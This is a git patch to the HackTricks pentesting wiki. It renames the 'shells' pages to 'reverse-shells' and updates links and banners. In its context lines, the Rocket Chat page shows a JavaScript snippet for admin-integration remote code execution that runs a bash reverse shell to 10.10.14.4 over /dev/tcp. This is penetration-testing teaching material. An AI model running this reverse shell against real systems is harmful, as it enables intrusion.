From 9afd316ac2119417bd56cb79968555821e08917a Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 31 Aug 2024 16:23:36 +0000 Subject: [PATCH] GITBOOK-4391: No subject --- SUMMARY.md | 10 +++++----- .../pentesting-methodology.md | 14 +++++++------- .../{shells => reverse-shells}/README.md | 0 .../{shells => reverse-shells}/full-ttys.md | 0 .../{shells => reverse-shells}/linux.md | 0 .../{shells => reverse-shells}/msfvenom.md | 0 .../{shells => reverse-shells}/windows.md | 0 .../pentesting-web/rocket-chat.md | 14 ++++++-------- 8 files changed, 18 insertions(+), 20 deletions(-) rename generic-methodologies-and-resources/{shells => reverse-shells}/README.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/full-ttys.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/linux.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/msfvenom.md (100%) rename generic-methodologies-and-resources/{shells => reverse-shells}/windows.md (100%) diff --git a/SUMMARY.md b/SUMMARY.md index 15aed9799..da21c1b58 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -74,11 +74,11 @@ * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md) * [Search Exploits](generic-methodologies-and-resources/search-exploits.md) -* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md) - * [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md) - * [Shells - Windows](generic-methodologies-and-resources/shells/windows.md) - * [Shells - Linux](generic-methodologies-and-resources/shells/linux.md) - * [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md) +* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md) + * [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md) + * [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md) + * [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md) + * [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md) ## 🐧 Linux Hardening diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 16e5e427f..31d17d27a 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -1,8 +1,8 @@ # Pentesting Methodology {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -75,9 +75,9 @@ In some scenarios a **Brute-Force** could be useful to **compromise** a **servic If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/): -### **7-** [**Getting Shell**](shells/) +### **7-** [**Getting Shell**](reverse-shells/) -Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/). +Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](reverse-shells/). Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\ @@ -139,7 +139,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve #### **Exploiting** -* [**Basic Linux Exploiting**](broken-reference) +* [**Basic Linux Exploiting**](broken-reference/) * [**Basic Windows Exploiting**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) * [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) @@ -158,8 +158,8 @@ If you are interested in **hacking career** and hack the unhackable - **we are h {% embed url="https://www.stmcyber.com/careers" %} {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/generic-methodologies-and-resources/shells/README.md b/generic-methodologies-and-resources/reverse-shells/README.md similarity index 100% rename from generic-methodologies-and-resources/shells/README.md rename to generic-methodologies-and-resources/reverse-shells/README.md diff --git a/generic-methodologies-and-resources/shells/full-ttys.md b/generic-methodologies-and-resources/reverse-shells/full-ttys.md similarity index 100% rename from generic-methodologies-and-resources/shells/full-ttys.md rename to generic-methodologies-and-resources/reverse-shells/full-ttys.md diff --git a/generic-methodologies-and-resources/shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md similarity index 100% rename from generic-methodologies-and-resources/shells/linux.md rename to generic-methodologies-and-resources/reverse-shells/linux.md diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md similarity index 100% rename from generic-methodologies-and-resources/shells/msfvenom.md rename to generic-methodologies-and-resources/reverse-shells/msfvenom.md diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md similarity index 100% rename from generic-methodologies-and-resources/shells/windows.md rename to generic-methodologies-and-resources/reverse-shells/windows.md diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 74931bb3e..4602e96b9 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -1,8 +1,8 @@ # Rocket Chat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -14,7 +14,6 @@ Learn & practice GCP Hacking: {% endhint %} -{% endhint %}
@@ -29,7 +28,7 @@ If you are admin inside Rocket Chat you can get RCE.
-* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like: +* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) like: ```javascript const require = console.log.constructor('return process.mainModule.require')(); @@ -55,9 +54,10 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
{% embed url="https://websec.nl/" %} + {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -69,5 +69,3 @@ Learn & practice GCP Hacking: {% endhint %} -
-{% endhint %}